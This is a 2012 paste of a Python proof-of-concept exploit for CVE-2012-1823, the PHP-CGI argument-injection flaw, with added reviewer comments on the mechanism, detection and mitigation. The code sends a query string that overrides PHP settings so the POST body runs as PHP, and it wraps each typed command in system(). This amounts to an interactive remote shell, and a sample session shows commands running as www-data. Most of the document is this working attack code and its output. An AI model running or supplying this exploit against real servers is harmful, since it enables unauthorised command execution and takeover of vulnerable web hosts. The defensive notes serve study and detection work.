infodox

cve-2012-1823.py

Dec 16th, 2012
  1. #!/usr/bin/python
  2. # cve-2012-1823 proof of concept
  3. # twitter: @info_dox
  4. # website: http://insecurety.net/
     #
     # Reviewer notes
     # --------------
     # CVE-2012-1823 is the PHP-CGI argument-injection bug: when PHP is run as a
     # CGI binary, a query string with no unescaped '=' is handed to php-cgi as
     # command-line arguments. This script passes two -d (ini override) switches
     # that way and sends PHP source in the POST body.
     #
     # Python 2 only (print statement, raw_input). Requests go over plain HTTP
     # and no timeout is set on them.
     #
     # Detection: web access logs showing a query string that starts with "-d"
     # and names allow_url_include or auto_prepend_file ('=' appears as %3d
     # here), paired with a POST whose body starts with "<?php".
     # Mitigation: run a PHP release that contains the fix for this CVE, avoid
     # exposing php-cgi directly to requests, and as a stop-gap have the web
     # server reject query strings that begin with "-".
  5. import requests
  6. import sys
  7.  
     # Exactly one argument (the host) is expected. Note that the usage path
     # exits with status 0 even though nothing was done.
  8. if len(sys.argv) != 2:
  9.     print "Usage: ./cve-2012-1823.py <target>"
  10.     sys.exit(0)
  11.  
      # The host is concatenated into the URL without validation.
      # The query string decodes to:
      #   -d allow_url_include=1 -d auto_prepend_file=php://input
      # i.e. allow including URL-style streams and prepend the request body
      # (php://input) to whatever script is served, so the POST body runs as PHP.
  12. target = sys.argv[1]
  13. url = """http://""" + target + """/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"""
      # Prefix and suffix that wrap each typed line in a PHP system() call;
      # die() ends the request before the originally requested script runs.
  14. lol = """<?php system('"""
  15. lol2 = """');die(); ?>"""
  16. print "[+] Connecting and spawning a shell..."
      # Despite the message above, there is no persistent session: every prompt
      # line is sent as its own POST, so each command leaves a separate
      # access-log entry on the server.
  17. while True:
  18.     try:
  19.         bobcat = raw_input("%s:~$ " %(target))
  20.         lulz = lol + bobcat + lol2
              # lulz is passed as the second positional argument of
              # requests.post, i.e. it is sent as the raw request body.
  21.         hax = requests.post(url, lulz)
  22.         print hax.text
          # Only Ctrl-C is handled (exit status 1); connection errors raised by
          # requests are not caught and will end the script with a traceback.
  23.     except KeyboardInterrupt:
  24.         print "\n[-] Quitting"
  25.         sys.exit(1)
  26.  
      # Author's sample session, kept as an unused string literal. The `id`
      # output shows the commands running as www-data, i.e. with the privileges
      # of the web server account.
  27. """
  28. [infodox@yore-ma:~]$ ./cve-2012-1823.py 192.168.1.50
  29. [+] Connecting and spawning a shell...
  30. 192.168.1.50:~$ id
  31. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  32.  
  33. 192.168.1.50:~$ pwd
  34. /var/www
  35.  
  36. 192.168.1.50:~$ uname -a
  37. Linux debian 2.6.32-5-amd64 #1 SMP Thu Mar 22 17:26:33 UTC 2012 x86_64 GNU/Linux
  38.  
  39. 192.168.1.50:~$
  40. """